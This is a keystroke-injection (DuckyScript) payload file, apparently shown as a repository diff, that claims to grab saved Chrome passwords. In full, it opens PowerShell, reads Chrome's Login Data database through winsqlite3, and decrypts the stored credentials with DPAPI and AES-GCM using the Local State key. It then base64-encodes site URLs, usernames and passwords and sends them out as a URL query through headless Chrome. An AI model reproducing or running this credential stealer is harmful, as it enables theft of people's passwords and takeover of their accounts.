■ ■ ■ ■ ■ ■
PasswordStuff/ChromePasswords/ChromePasswords.txt
1 | | - | REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) |
2 | | - | REM Description: Grabs saved Passwords from Chrome |
3 | | - | REM Version: 1.0 |
4 | | - | REM Category: Passwords |
5 | | - | DELAY 5000 |
6 | | - | GUI r |
7 | | - | DELAY 250 |
8 | | - | STRING powershell |
9 | | - | ENTER |
10 | | - | DELAY 2500 |
11 | | - | STRING pwsh |
12 | | - | ENTER |
13 | | - | DELAY 2500 |
14 | | - | STRING $d=Add-Type -A System.Security |
15 | | - | ENTER |
16 | | - | STRING $p='public static' |
17 | | - | ENTER |
18 | | - | STRING $g=""")]$p extern" |
19 | | - | ENTER |
20 | | - | STRING $i='[DllImport("winsqlite3",EntryPoint="sqlite3_' |
21 | | - | ENTER |
22 | | - | STRING $m="[MarshalAs(UnmanagedType.LP" |
23 | | - | ENTER |
24 | | - | STRING $q='(s,i)' |
25 | | - | ENTER |
26 | | - | STRING $f='(p s,int i)' |
27 | | - | ENTER |
28 | | - | STRING $z=$env:LOCALAPPDATA+'\Google\Chrome\User Data' |
29 | | - | ENTER |
30 | | - | STRING $u=[Security.Cryptography.ProtectedData] |
31 | | - | ENTER |
32 | | - | STRING Add-Type "using System.Runtime.InteropServices;using p=System.IntPtr;$p class W{$($i)open$g p O($($m)Str)]string f,out p d);$($i)prepare16_v2$g p P(p d,$($m)WStr)]string l,int n,out p s,p t);$($i)step$g p S(p s);$($i)column_text16$g p C$f;$($i)column_bytes$g int Y$f;$($i)column_blob$g p L$f;$p string T$f{return Marshal.PtrToStringUni(C$q);}$p byte[] B$f{var r=new byte[Y$q];Marshal.Copy(L$q,r,0,Y$q);return r;}}" |
33 | | - | ENTER |
34 | | - | STRING $s=[W]::O("$z\\Default\\Login Data",[ref]$d) |
35 | | - | ENTER |
36 | | - | STRING $l=@() |
37 | | - | ENTER |
38 | | - | STRING if($host.Version-like"7*"){$b=(gc "$z\\Local State"|ConvertFrom-Json).os_crypt.encrypted_key |
39 | | - | ENTER |
40 | | - | STRING $x=[Security.Cryptography.AesGcm]::New($u::Unprotect([Convert]::FromBase64String($b)[5..($b.length-1)],$n,0))}$_=[W]::P($d,"SELECT*FROM logins WHERE blacklisted_by_user=0",-1,[ref]$s,0) |
41 | | - | ENTER |
42 | | - | STRING for(;!([W]::S($s)%100)){$l+=[W]::T($s,0),[W]::T($s,3) |
43 | | - | ENTER |
44 | | - | STRING $c=[W]::B($s,5) |
45 | | - | ENTER |
46 | | - | STRING try{$e=$u::Unprotect($c,$n,0)}catch{if($x){$k=$c.length |
47 | | - | ENTER |
48 | | - | STRING $e=[byte[]]::new($k-31) |
49 | | - | ENTER |
50 | | - | STRING $x.Decrypt($c[3..14],$c[15..($k-17)],$c[($k-16)..($k-1)],$e)}}$l+=($e|%{[char]$_})-join''} |
51 | | - | ENTER |
52 | | - | STRING $r=[Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes(($l)-join',')) |
53 | | - | ENTER |
54 | | - | STRING start-process "chrome" "--headless http://localhost:8000/?$r" |
55 | | - | ENTER |
56 | | - | DELAY 1000 |
57 | | - | STRING exit |
58 | | - | ENTER |
59 | | - | DELAY 250 |
60 | | - | STRING exit |
61 | | - | ENTER |
62 | | - | |